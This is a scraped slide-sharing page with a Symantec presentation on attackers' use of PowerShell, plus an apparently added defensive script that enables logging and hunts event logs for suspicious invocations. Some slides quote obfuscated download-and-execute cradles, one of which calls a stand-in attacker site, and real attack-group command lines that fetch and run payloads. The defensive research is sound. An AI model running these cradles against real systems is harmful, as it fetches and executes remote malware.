Top 10 ways to make hackers excited: All about the shortcuts not worth taking
 
Module 4 qui parle de la sécurisation des applications
Module 4 qui parle de la sécurisation des applicationsModule 4 qui parle de la sécurisation des applications
Module 4 qui parle de la sécurisation des applications
 

Plus de Symantec Security Response

Plus de Symantec Security Response (10)

ISTR 23: Internet Security Threat Report
ISTR 23: Internet Security Threat Report ISTR 23: Internet Security Threat Report
ISTR 23: Internet Security Threat Report
 
Sowbug: Cyber espionage group targets South American and Southeast Asian gove...
Sowbug: Cyber espionage group targets South American and Southeast Asian gove...Sowbug: Cyber espionage group targets South American and Southeast Asian gove...
Sowbug: Cyber espionage group targets South American and Southeast Asian gove...
 
Threat landscape update: June to September 2017
Threat landscape update: June to September 2017Threat landscape update: June to September 2017
Threat landscape update: June to September 2017
 
Email threats 2017: Users encounter threats through email twice as often as o...
Email threats 2017: Users encounter threats through email twice as often as o...Email threats 2017: Users encounter threats through email twice as often as o...
Email threats 2017: Users encounter threats through email twice as often as o...
 
Dragonfly: Western energy sector targeted by sophisticated attack group
Dragonfly: Western energy sector targeted by sophisticated attack groupDragonfly: Western energy sector targeted by sophisticated attack group
Dragonfly: Western energy sector targeted by sophisticated attack group
 
Ransomware 2017: New threats emerge
Ransomware 2017: New threats emergeRansomware 2017: New threats emerge
Ransomware 2017: New threats emerge
 
Financial threats review 2017
Financial threats review 2017Financial threats review 2017
Financial threats review 2017
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
 
Shamoon attacks - Destructive malware targeting Middle East organizations
Shamoon attacks - Destructive malware targeting Middle East organizationsShamoon attacks - Destructive malware targeting Middle East organizations
Shamoon attacks - Destructive malware targeting Middle East organizations
 
WannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowWannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to know
 

Dernier

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Dernier (20)

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 

PowerShell: The increased use of PowerShell in cyber attacks

  • 1. The Rise of PowerShell Threats Candid Wueest Presenter’s Title Here
  • 2. PowerShell… in a nutshell • PowerShell is a scripting language and command-line shell based on .NET • Access to features such as Component Object Model (COM) & WMI • Very powerful - features many cmdlets (command-lets) • Installed by default on most Windows systems • Default command shell from Windows 10 build 14971 onwards • PowerShell scripts (.ps1) do not execute when double clicked 2 Copyright © 2017 Symantec Corporation
  • 3. 10 Reasons Why Attackers Love PowerShell 1. Installed by default on all new Windows computers 2. Can execute directly from memory (stealthy) 3. Generates few traces by default (forensic/stealthy) 4. Has remote access capabilities by default with encrypted traffic 5. As a script, it is easy to obfuscate & difficult to detect 6. Defenders often overlook it when hardening their systems 7. It can bypass application-whitelisting tools depending on the configuration 8. Many gateway sandboxes do not handle script-based malware well 9. It has a growing community with readily available scripts 10. Many system administrators use and trust the framework (hiding in plain sight) 3 Copyright © 2017 Symantec Corporation
  • 4. Common Malware Use Cases for PowerShell 4 Copyright © 2017 Symantec Corporation PowerShell script used to download payload to disk or memory. Often used in email attachments such as WSF or document macros. DOWNLOADER PowerShell script used as persistent load point on Windows. Often stored completely in registry (file-less) e.g. Kotver or within WMI LOAD POINT PowerShell script remoting to execute on remote computer (Invoke- Command) Download and execute Mimikatz, etc. in order to steal credentials LATERAL MOVEMENT
  • 5. Example: Trojan.Poweliks 5 Copyright © 2017 Symantec Corporation • File-less load point • Multiple stages in registry • Decrypted in memory • Can be protected by a local encryption key e.g. MAC address
  • 6. PowerShell Execution Policy Script execution is restricted by Windows, but can easily be overcome by the attacker. For example on the command line with: Copyright © 2017 Symantec Corporation 6 • Restricted • AllSigned • RemoteSigned • Unrestricted • Bypass EXECUTION POLICY OPTIONS • MachinePolicy • UserPolicy • Process • CurrentUser • LocalMachine POLICY SCOPE OPTIONS ExecutionPolicy bypass command <a single command>
  • 7. Script Execution Arguments Copyright © 2017 Symantec Corporation 7 Command Line Args Description Occurrence In All Samples Argument Shortcut Distribution -NoProfile ignore the profile file 33.77% NoProfile (87%) / NoP (13%) -WindowStyle Hidden hide the command window 23.76% WindowStyle (64%) / Window (18%) / Wind (<1%) / Win (<1%) / w (18%) -ExecutionPolicy Bypass ignore the execution policy 23.43% ExecutionPolicy (84%) / Exec (2%) / ex (8%) / ep (5%) -Command run a single command 22.45% Command (100%) -NoLogo, don’t displaying the banner 18.98% NoLogo (89%) / NoL (11%) -InputFormat Set the format for data input 16.59% Inputformat -EncodedCommand execute base64-encoded command 6.58% EncodedCommand (9%) / Enc (91%) -Noninteractive starts in non-interactive mode. 3.82% NonInteractive (7%) / nonI (93%) -File Load script from file 2.61% File (100%)
  • 8. Obfuscation • As with any scripting language, obfuscation is easy • 20+ different obfuscation tricks available, can be used iteratively • Tools like «invoke-obfuscation» makes it simple Copyright © 2017 Symantec Corporation 8 (New-Object Net.WebClient).DownloadString("http://XXXX”) Example script downloader $webcl=New-Object Net.Webclient; $webcl.DownloadString($url) Object replacement with variables (&(GCM New-Ob*)net.webclient).downloadstring($url) Command substitution (New-Object Net.WebClient).Downloadstring(("http://{2}{1}"-f 'no','.TLD',’myAttackerSite’)) String manipulation
  • 9. Obfuscation In The Wild • Only 8% of the 111 observed PowerShell threats used obfuscation • Targeted attack groups rarely bother with obfuscation – Too much obfuscation can make the script appear more suspicious • Extended script logging can reverse most of the obfuscation Copyright © 2017 Symantec Corporation 9
  • 10. Prevalence • 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious Copyright © 2017 Symantec Corporation 10 1. 9.4% W97M.Downloader 2. 4.5% Trojan.Kotver 3. 4.0% JS.Downloader TOP 3 THREATS THAT USE POWERSHELL Volume of PowerShell samples from customer in our sandbox in 2016
  • 11. PowerShell In Attacks • PowerShell is gaining ground with attackers… • And community support is rising fast Copyright © 2017 Symantec Corporation 11 • PowerSploit • PowerShell Empire • NiShang • PS>Attack • Mimikatz PEN TESTING FRAMEWORKS AVAILABLE • Ransomware • Downloader • Back door • ClickFraud • Banking Trojan COMMON MALWARE TYPES OBSERVED
  • 12. WE EXPECT TARGETED ATTACK GROUPS TO CONTINUE TO FAVOR SIMPLE POWERSHELL SCRIPTS AS PART OF THEIR ATTACK TOOL CHAIN IN THE FUTURE. Targeted Attacks Using PowerShell Most targeted attack groups use PowerShell scripts, as part of “living off the land” tactic • Often used as downloader over HTTPS • Information gathering (e.g. Mimikatz) – Some still use system tools for data gathering, maybe to avoid behavior based detection mechanisms • Not yet seen any APT groups use a full PowerShell framework from end-to-end – unlikely to happen Copyright © 2017 Symantec Corporation 12
  • 13. Example Usage By Targeted Attack Groups Attack Group Script Invocations Pupa/DeepPanda powershell.exe -w hidden -nologo -nointeractive -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring([REMOVED]))" Pupa/DeepPanda powershell.exe -Win hidden -Enc [REMOVED] Pupa/DeepPanda powershell -noprofile -windowstyle hidden -noninteractive -encodedcommand [REMOVED] SeaDuke powershell -executionpolicy bypass -File diag3.ps1 SeaDuke powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain [REMOVED] -User [REMOVED] -Password [REMOVED] –Mailbox CozyDuke powershell.exe -WindowStyle hidden -encodedCommand [REMOVED] Odinaff powershell.exe -NoP -NonI -W Hidden -Enc [REMOVED] Buckeye powershell.exe -w 1 cls (New-Object Net.WebClient).DownloadFile("""http://[REMOVED]/images/rec.exe""","""$env:tmprec.exe """);Iex %tmp%rec.exe Copyright © 2017 Symantec Corporation 13
Things To Keep In Mind
• PowerShell scripts can be executed without powershell.exe, e.g. from a .NET binary that hosts the engine
• Most attacks require the attacker to be able to execute code first
– PowerShell is not an exploit
– Common exploits and social engineering tricks still apply
• 55% of the malicious PowerShell scripts were executed from the command line
– Often from a dropped batch or VBS file
• PowerShell can be used for defense as well as offense
14
Mitigation
• Upgrade to PowerShell 5+ where possible (to enable logging)
• Enable extended logging/module logging, and process and analyze the logs
• Check for PowerShell use on your systems (location, time, user, file name, etc.)
• Evaluate PowerShell constrained language mode/restricted runspaces
• Evaluate system hardening, file whitelisting or AppLocker
APPLY COMMON BEST PRACTICES FOR EMAIL AND ENDPOINT SECURITY
PREVENT – Block the incursion or infection, and prevent any damage from occurring
CONTAIN – Limit the spread of an attack in the event of an intrusion
RESPOND – Have an incident response process ready, learn from the attack, and improve defenses
15
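One way to act on the first three mitigation bullets, as an added example in PowerShell that is not part of the Symantec deck: it turns on the script block and module logging that PowerShell 5+ reads from the policy registry keys, then hunts the resulting Event ID 4104 records and the Security log's 4688 process-creation records for the invocation patterns shown on the "Example Usage By Targeted Attack Groups" slide. It assumes an elevated session on Windows with PowerShell 5 or later; the command-line field of 4688 is only populated when the Windows audit setting "Include command line in process creation events" is on, which this script does not change.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the deck). Assumes PowerShell 5+ on Windows, run elevated.

$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# 1. Script block logging: Event ID 4104 in Microsoft-Windows-PowerShell/Operational holds
#    the de-obfuscated script text, even for -EncodedCommand / IEX code that never touches disk.
$sbl = Join-Path $policyRoot 'ScriptBlockLogging'
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

# 2. Module logging: Event ID 4103 records pipeline execution details for every module ('*').
$ml = Join-Path $policyRoot 'ModuleLogging'
New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
Set-ItemProperty -Path $ml -Name 'EnableModuleLogging' -Value 1 -Type DWord
Set-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*' -Type String

# 3. Hunt the logs for the traits the slide's attacker command lines share.
function Find-SuspiciousPowerShell {
    param([int]$Days = 1)
    $since = (Get-Date).AddDays(-$Days)
    # Launch flags: hidden window (-w hidden / -w 1), policy bypass, base64 encoded command.
    $cmdlineRegex = [regex]'(?i)-w(indowstyle)?\s+(hidden|1)\b|-e(p|xecutionpolicy)\s+bypass|-e(nc|ncodedcommand)\s+[A-Za-z0-9+/=]{16,}'
    # Script bodies: download-and-execute and in-memory loading.
    $scriptRegex  = [regex]'(?i)net\.webclient.*download(string|file)|\b(iex|invoke-expression)\b|frombase64string'

    # (a) Process creation: Properties[5] = NewProcessName, Properties[8] = CommandLine.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
      Where-Object { ([string]$_.Properties[5].Value) -match 'powershell(_ise)?\.exe$' -and
                     $cmdlineRegex.IsMatch([string]$_.Properties[8].Value) } |
      ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; Event = 4688
                                          User = $_.Properties[1].Value; Text = $_.Properties[8].Value } }

    # (b) Script block text: Properties[2] = ScriptBlockText (decoded, so -Enc payloads are readable).
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since } -ErrorAction SilentlyContinue |
      Where-Object { $scriptRegex.IsMatch([string]$_.Properties[2].Value) } |
      ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; Event = 4104
                                          User = $_.UserId; Text = $_.Properties[2].Value } }
}

# Review the last week; each hit shows when, who and the offending command line or script text.
Find-SuspiciousPowerShell -Days 7 | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Legitimate administration scripts will also match, so treat the output as a triage list to review against location, time and user, as the slide suggests.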
Symantec: Robust Protection Against PowerShell Threats
Advanced Antivirus Engine
• Symantec uses an array of detection engines including an advanced signature-based antivirus engine with heuristics, just-in-time (JIT) memory-scanning, and machine-learning engines. This allows the detection of scripts executed directly in memory.
SONAR Behavior Engine
• SONAR is Symantec’s real-time behavior-based protection that blocks potentially malicious applications from running on the computer. It detects malware without requiring any specific detection signatures. SONAR uses heuristics, reputation data, and behavioral policies to detect emerging and unknown threats.
• SONAR can detect PowerShell script behaviors often used in post-infection lateral movement and block them.
Email Protection
• Email-filtering services such as Symantec Email Security.cloud can block malicious emails before they reach users.
• Symantec Messaging Gateway’s Disarm Technology can also protect computers from this threat by removing malicious content from attached documents before they even reach the user.
Blue Coat Malware Analysis sandbox
• Sandboxes such as Blue Coat Malware Analysis have the capability to analyze and block malicious scripts including PowerShell scripts. The technology can overcome multiple layers of obfuscation to detect deeply hidden suspicious behavior.
System Hardening
• Symantec’s system hardening solution, Symantec Data Center Security, can secure physical and virtual servers, and monitor the compliance posture of server systems for on-premise, public, and private cloud data centers. By defining allowed behavior, Symantec Data Center Security can limit the use of PowerShell and any of its actions.
17
Conclusion
• PowerShell is very powerful and is here to stay
• PowerShell is popular for downloading & lateral movement
• Attackers currently do not use much obfuscation
• In-memory execution leaves only a few forensic traces
• Logging can generate a lot of data to process
• But if full logging is enabled, then activity is very difficult to hide
18
Further reading
• BLOG: PowerShell threats surge: 95.4 percent of analyzed scripts were malicious
• WHITEPAPER: The increased use of PowerShell in attacks
19
Thank you!
Candid Wueest
Symantec Corporation (NASDAQ: SYMC), the world’s leading cyber security company, helps businesses, governments and people secure their most important data wherever it lives. Organizations across the world look to Symantec for strategic, integrated solutions to defend against sophisticated attacks across endpoints, cloud and infrastructure. Likewise, a global community of more than 50 million people and families rely on Symantec’s Norton suite of products for protection at home and across all of their devices. Symantec operates one of the world’s largest civilian cyber intelligence networks, allowing it to see and protect against the most advanced threats. For additional information, please visit www.symantec.com or connect with us on Facebook, Twitter, and LinkedIn.
Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the United States and other countries. Other names may be trademarks of their respective owners.
20